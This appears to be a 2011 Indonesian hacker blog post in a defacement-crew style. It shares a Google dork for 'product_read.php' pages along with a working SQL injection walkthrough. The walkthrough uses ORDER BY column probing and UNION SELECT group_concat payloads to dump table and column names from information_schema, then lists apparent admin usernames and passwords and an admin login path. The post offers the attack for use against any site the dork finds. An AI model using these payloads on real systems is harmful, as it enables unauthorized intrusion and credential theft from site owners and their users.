r00t »» , »» SQLi vuln in dork product_read

SQLi vuln in dork product_read

by LOLids artich | | , | 0 komentar »


kamis 24/03/2011 @ 00.01 am

lagi jalan-jalan di mbah google cari info yang menarik lagi ngetik keyword: product_review kok muncul situs - situs menarik! coba dech iseng-iseng maen-maen dikit coz udah lama juga engga' main beginian sejak ada bini dirumah :). langsung saja sikaatt..t.. preetts!

####################################
auth : LOL1ds
team : IHT
push : LOL1ds[at]hackermail[dot]com
dork : product_read.php?id=LOL1ds
type : SQLi vulnerability
####################################
exp:
./ http://localhost.com/product_read.php?id=LOL'
./ order by 26--
./ product_read.php?id=LOL+union+select+1,2,group_concat(table_name)
,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
+from+information_schema.tables+where+table_schema=database()--
./ admin,banner,banner_bk160709,counter,counter_copy,news,phpbb_acl_groups,
phpbb_acl_options,phpbb_acl_roles,phpbb_acl_roles_data,phpbb_acl_users,
phpbb_attachments,phpbb_banlist,phpbb_bbcodes,phpbb_bookmarks,phpbb_bots,
phpbb_config,phpbb_confirm,phpbb_disallow,phpbb_drafts,phpbb_extension_groups,
phpbb_extensions,phpbb_forums,phpbb_forums_access,phpbb_forums_track,
phpbb_forums_watch,phpbb_groups,phpbb_icons,phpbb_lang,phpbb_log,
phpbb_moderator_cache,phpbb_modules,phpbb_poll_options,phpbb_poll_votes,
phpbb_posts,phpbb_privmsgs,phpbb_privmsgs_folder,phpbb_privmsgs_rules,
phpbb_privmsgs_to,phpbb_profile_fields,phpbb_profile_fields_data,
phpbb_profile_fields_lang,phpbb_profile_lang,phpbb_ranks,phpbb_reports,
phpbb_reports_reasons,phpbb_search_results,phpbb_search_wordlist,
phpbb_search_wordmatch,phpbb_sessions,phpbb_sessions_keys,phpbb_sitelist,
phpbb_smilies,phpbb_spam_log,phpbb_spam_words,phpbb_styles,
phpbb_styles_imageset,phpbb_styles_imageset_data,phpbb_styles_template,
phpbb_styles_template_data,
phpbb_styles_theme,phpb
#####################################
exp table :
./ admin
./ ./ product_read.php?id=LOL+union+select+1,2,group_concat(column_name)
,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
+from+information_schema.columns+where+table_name=0xLOL--
id,user,pass,level
#####################################
user : LOL | espazs
pass : LOL1ds | LOL
#####################################
admin login : http://localhost.com/admin/login.php
#####################################
demo : just test security-re!!! Complite Zone-h.org
#####################################
gr33atz : Allah S.W.T, my wife, All my friends in team, and You.
moxercrew, Indonesianhackerteam, indonesiancoder, devilzc0de, jatimcrew, surabayahackerlink, jasakom, yogyacarderlink, Magelangcyber, Jasakom, echo.





Article information: Description: SQLi vuln in dork product_read Rating: 4.5 - Reviewer: LOLids artich - ItemReviewed: SQLi vuln in dork product_read


Related Tips, Tricks and Tutorials :



0 komentar Post :
SQLi vuln in dork product_read


NOTE:
Follow me ON Facebook , Twitter or

Blog ini adalah Blog DoFollow dengan PageRank Free PageRank Checker, sobat akan mendapatkan Backlink untuk BLOG anda dengan berkomentar di Blog ini. Jangan ada komentar Spam, Please!!.

"Jika Menemukan LINK yg Tidak bisa di akses pada BLOG ini!, silahkan beritahu kepada kami melalui Komentar, Form, etc . sesegera mungkin kami akan memperbaikinya. Terimakasih"




Post a Comment

Next Prev Home